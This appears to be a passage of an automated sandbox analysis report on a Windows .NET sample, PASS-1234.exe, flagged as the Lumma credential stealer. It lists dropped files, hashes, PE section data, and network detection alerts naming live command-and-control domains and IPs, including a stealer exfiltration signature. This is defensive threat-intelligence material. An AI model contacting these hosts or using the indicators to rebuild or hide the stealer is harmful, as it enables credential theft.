                                                                                        • 104.21.96.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        No context
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):0.989892371139277
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:M+sFg6JTekd0BU/iaG1CzuiFL9Z24IO8Nn:0Fg6JT/eBU/iapzuiFpY4IO8N
                                                                                        MD5:6596F6F67AB8F64BD3048619A510F631
                                                                                        SHA1:FFE65C2E3B8185F275BCB8B5A6173CDF74CDB138
                                                                                        SHA-256:60DF695631AB6A773E136AB016AC1EC82532A862FCF227137B63E13237DBC683
                                                                                        SHA-512:0A5AED60834DC1D5696639CE697E18947B399068DC794DF0A268F9198A814E2326D609B397C912B921BB1D7DD8C4F22635DFA94EB82BCF322F1741AB8CD1E981
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.3.6.7.5.3.5.8.1.4.1.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.3.6.7.5.5.0.8.1.4.3.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.b.9.8.0.9.7.-.6.c.0.3.-.4.1.8.6.-.9.0.0.5.-.e.2.b.d.0.3.b.9.9.b.7.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.9.b.4.b.c.a.-.8.6.7.f.-.4.e.6.a.-.9.2.a.f.-.2.f.d.7.c.d.1.c.c.5.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.A.S.S.-.1.2.3.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.a.d.i.s.o.n.V.i.o.l.e.t.T.e.s.s.a...p.d.f.K.D.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.7.c.-.0.0.0.1.-.0.0.1.5.-.5.1.4.f.-.a.f.8.5.a.2.5.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.0.7.a.0.d.9.1.4.9.f.e.3.b.8.7.0.7.6.f.3.3.e.7.1.9.a.1.a.9.f.7.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.d.2.a.e.2.4.0.5.d.b.d.7.7.d.4.d.6.c.2.2.6.5.8.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Dec 31 16:39:14 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):196696
                                                                                        Entropy (8bit):3.384647930402179
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:Dt4zdl3jgtKcW3nxUCDKX9rpN4uE2aOayLTgGsokODgkFw+t:54n2WXBKtD4uEqayLTg7kmQ
                                                                                        MD5:35D1521778DAF1E68C9CFF796150879F
                                                                                        SHA1:F809429AFEB044D1AC44E3CF65CC9ACA2FDCB85B
                                                                                        SHA-256:5B878B118B50C67B4CE7C75AABBAC4EA5E673D4AB9657DD5189A14C2B36E2859
                                                                                        SHA-512:00CA965E8E66B3D029F375C5C30B6052390978DDA36547FB3DF1A92F952343E2EE0F72537DE82C6F33211ED216839900C5771F4F2518F0D99B94007CECF19DC9
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:MDMP..a..... .......2.tg............D...............X.......$................J..........`.......8...........T...........00..(...........,............ ..............................................................................eJ....... ......GenuineIntel............T.......|...0.tg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8408
                                                                                        Entropy (8bit):3.7068200955563277
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJut69b6Y2DpSUkTcpyugmfZ2YiprQ89bvTsfnLlm:R6lXJ06B6YkSUJpyugmfEY6v4fk
                                                                                        MD5:FACC822EACD46C831D06C8E1A338170B
                                                                                        SHA1:3A9142F0179FA46C950E62DFF9C828EE4FCA27EB
                                                                                        SHA-256:5641997628A584813114FD406BA2FA184969387CEDFED26DD213AAB8FAD9E080
                                                                                        SHA-512:70A5E6C56F56A93DA6D4243761E6FF1217873F858584D4341F62C845818D680E9015381E29B6C8707B14C690D7A3DD6EF3D806FE6A7023138EF391208EE07F9E
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.1.6.<./.P.i.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4776
                                                                                        Entropy (8bit):4.528568462195372
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsBJg77aI9vD7EWpW8VYcYm8M4JwI2F+f+q8vPptwn4Id:uIjfTI7Fp7VsJwGfKBSn4Id
                                                                                        MD5:7604105388109DEB7C1FFC14AC49007E
                                                                                        SHA1:54C0B260E26E4111ECFA4E9A1A099069E44012F9
                                                                                        SHA-256:350FEBD032A843CEBA45352E80B5D08F1906A60D2666BAB2B86B0051F769A8AE
                                                                                        SHA-512:57D2EE6B2F510724A887CA8EDC8920752A4A646BE9C3D70D2BDF19E3D88F3711295C818977D16014E1A996F5513B310E2E9FB6058341446E2CDD8DBEAEF69033
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="655661" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Users\user\Desktop\PASS-1234.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):442880
                                                                                        Entropy (8bit):7.120845466043454
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:YCBQRUrXgU86ZwW+G3QmRtaAnrZwyBwnB9yEwQe37zgg8u5W:vBRgU86D+vugSwywn3aH75W
                                                                                        MD5:DB9FA73B991DCA9E4BC648F0943D5FC2
                                                                                        SHA1:856E36EC4C04B47D5072DCA1965FC79F8030BD77
                                                                                        SHA-256:1ADF7A2EA992D38467E1170451445D5492FA5C8D00C8D62776281C61393910C4
                                                                                        SHA-512:32C390A7D02263BD661B6D3D7BA2B3B6E59BFD9BE0E2D46F4CB3F916A79233057C0A2180C2A2689C585C5424EEAE5C3156A3154151B76FF75ECB4580D704B294
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Reputation:low
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....sg...........!.........:............................................................@.............................|.......P...................................\...............................x...@...............T............................text...(........................... ..`.rdata...\.......^..................@..@.data...............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.468788450702494
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:czZfpi6ceLPx9skLmb0fPZWSP3aJG8nAgeiJRMMhA2zX4WABluuNojDH5S:iZHtPZWOKnMM6bFpuj4
                                                                                        MD5:0F05ECC39271234EC0FFF5D2EF06D370
                                                                                        SHA1:557F5F8FAD3740732C121C5C42527B05F51DB47F
                                                                                        SHA-256:E8E893EBE12CAC704F9A5711891A659A45F5346735F0A028E92907EB62CD627A
                                                                                        SHA-512:5E8104F97F5800465A07A1F6DEC5545265C5887EE225E1D119C9F1528F9DC624094D5DD11A698E8DF02126370989A8C57C6C13E5D2F58F863BBC16EE6A29E356
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..P..[................................................................................................................................................................................................................................................................................................................................................F.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\PASS-1234.exe
                                                                                        File Type:ASCII text, with very long lines (354), with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1415
                                                                                        Entropy (8bit):4.534460721917906
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:7v74NuVMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4EMff2p8p14nrPKktp
                                                                                        MD5:E1192DC383FB3C1F3356A5D5D58D2E93
                                                                                        SHA1:D3BC6886D9BBA939DB0F3B94405B3FFAE845AF6F
                                                                                        SHA-256:2B4C0FE835D8CEE104858536B6B526C49A820D8228499EFF9454359ED24A3C37
                                                                                        SHA-512:BDA9F7F2D40F79BF41C625467C5B65BB908901B3D3DE989F4A55B33380989B8FC8B8DA0765C434B7150BAD3001FE6DB735DB12209468669B1CE9AC5FB15A7B02
                                                                                        Malicious:false
                                                                                        Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "MadisonVioletTessa" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetSt
                                                                                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.642427017875631
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:PASS-1234.exe
                                                                                        File size:761'856 bytes
                                                                                        MD5:cf15f3e3576d512cf0696d4035212451
                                                                                        SHA1:b9d2ae2405dbd77d4d6c226589990872319f98ce
                                                                                        SHA256:3114e7c13f6545c7cb73343fbcb4ec4b0648751091d796f7923b17818603fb36
                                                                                        SHA512:2b1d8a5a5f24768c6a733af9393376e533958719de452f34d88496f98cc600efc7ab94e57a23e57326d4106e978a5a24721ee633d1e498dedc6c9e949a0a83c8
                                                                                        SSDEEP:12288:J8t1vT9z4WJ7lM3us92O7naDBKKnTur1AOy56/NlbFLJkG3Oa4j3cEsjp2LMVmAL:J45zzBi96Djo1QU/rFLS4Src
                                                                                        TLSH:E5F44A9C726072DFC867D472DEA82C68FA6174BB931F4217A02716AD9E0D897CF150F2
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sg..............0.............. ... ... ....@.. .......................@............@................................
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x4c200a
                                                                                        Entrypoint Section:
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6773E6B9 [Tue Dec 31 12:42:33 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [004C2000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9274c0x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x620.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc20000x8
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x920000x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        C;FTo0x20000x8e3a40x8e40041c5f07a071f717348063b41ba374bafFalse1.0003192278119508data7.999702756897987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .text0x920000x2aad00x2ac0051fa688b02d098fc5ca64330fee57d0bFalse0.3164804915935672data4.6017567715327985IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xbe0000x6200x800f8a57bb5b4871395e61edfad4a51a674False0.35595703125data3.5124491312401203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xc00000xc0x200f49806f5a4d3af8de38be4272fdc1bfeFalse0.044921875data0.09262353601004472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        0xc20000x100x2006740637d846e5e93ae64944cc2f88318False0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0xbe0a00x394OpenPGP Secret Key0.45414847161572053
                                                                                        RT_MANIFEST0xbe4340x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-31T17:39:14.247349+01002058550ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)1192.168.2.6503841.1.1.153UDP
                                                                                        2024-12-31T17:39:14.786997+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.649709188.114.97.3443TCP
                                                                                        2024-12-31T17:39:14.786997+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709188.114.97.3443TCP
                                                                                        2024-12-31T17:39:46.220798+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649709188.114.97.3443TCP
                                                                                        2024-12-31T17:39:46.220798+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709188.114.97.3443TCP
                                                                                        2024-12-31T17:39:46.244581+01002058616ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)1192.168.2.6576161.1.1.153UDP
                                                                                        2024-12-31T17:39:46.331181+01002058598ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)1192.168.2.6570161.1.1.153UDP
                                                                                        2024-12-31T17:39:46.812877+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649898104.21.96.1443TCP
                                                                                        2024-12-31T17:39:46.812877+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649898104.21.96.1443TCP
                                                                                        2024-12-31T17:40:07.873836+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649898104.21.96.1443TCP
                                                                                        2024-12-31T17:40:07.873836+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649898104.21.96.1443TCP
                                                                                        2024-12-31T17:40:08.343881+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649986104.21.96.1443TCP
                                                                                        2024-12-31T17:40:08.343881+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649986104.21.96.1443TCP
                                                                                        2024-12-31T17:40:08.799774+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649986104.21.96.1443TCP
                                                                                        2024-12-31T17:40:08.799774+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649986104.21.96.1443TCP
                                                                                        2024-12-31T17:40:09.507842+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649988104.21.96.1443TCP
                                                                                        2024-12-31T17:40:09.507842+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649988104.21.96.1443TCP
                                                                                        2024-12-31T17:40:10.010366+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649988104.21.96.1443TCP
                                                                                        2024-12-31T17:40:10.734503+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649989104.21.96.1443TCP
                                                                                        2024-12-31T17:40:10.734503+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649989104.21.96.1443TCP
                                                                                        2024-12-31T17:40:11.944071+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649990104.21.96.1443TCP
                                                                                        2024-12-31T17:40:11.944071+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649990104.21.96.1443TCP
                                                                                        2024-12-31T17:40:13.518980+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649991104.21.96.1443TCP
                                                                                        2024-12-31T17:40:13.518980+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649991104.21.96.1443TCP
                                                                                        2024-12-31T17:40:16.683127+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649992104.21.96.1443TCP
                                                                                        2024-12-31T17:40:16.683127+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649992104.21.96.1443TCP
                                                                                        2024-12-31T17:40:18.160408+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649993104.21.96.1443TCP
                                                                                        2024-12-31T17:40:18.160408+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649993104.21.96.1443TCP
                                                                                        2024-12-31T17:40:21.336200+01002058599ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)1192.168.2.649994104.21.96.1443TCP
                                                                                        2024-12-31T17:40:21.336200+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649994104.21.96.1443TCP
                                                                                        2024-12-31T17:40:21.794131+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649994104.21.96.1443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:39:14.299583912 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:14.299633980 CET44349709188.114.97.3192.168.2.6
                                                                                        Dec 31, 2024 17:39:14.299724102 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:14.303783894 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:14.303797960 CET44349709188.114.97.3192.168.2.6
                                                                                        Dec 31, 2024 17:39:14.786921978 CET44349709188.114.97.3192.168.2.6
                                                                                        Dec 31, 2024 17:39:14.786997080 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:14.825481892 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:14.825505972 CET44349709188.114.97.3192.168.2.6
                                                                                        Dec 31, 2024 17:39:14.825853109 CET44349709188.114.97.3192.168.2.6
                                                                                        Dec 31, 2024 17:39:14.875792027 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:15.799333096 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:15.799352884 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:15.799484968 CET44349709188.114.97.3192.168.2.6
                                                                                        Dec 31, 2024 17:39:46.220010042 CET49709443192.168.2.6188.114.97.3
                                                                                        Dec 31, 2024 17:39:46.341721058 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:39:46.341758966 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:39:46.341933012 CET49898443192.168.2.6104.21.96.1
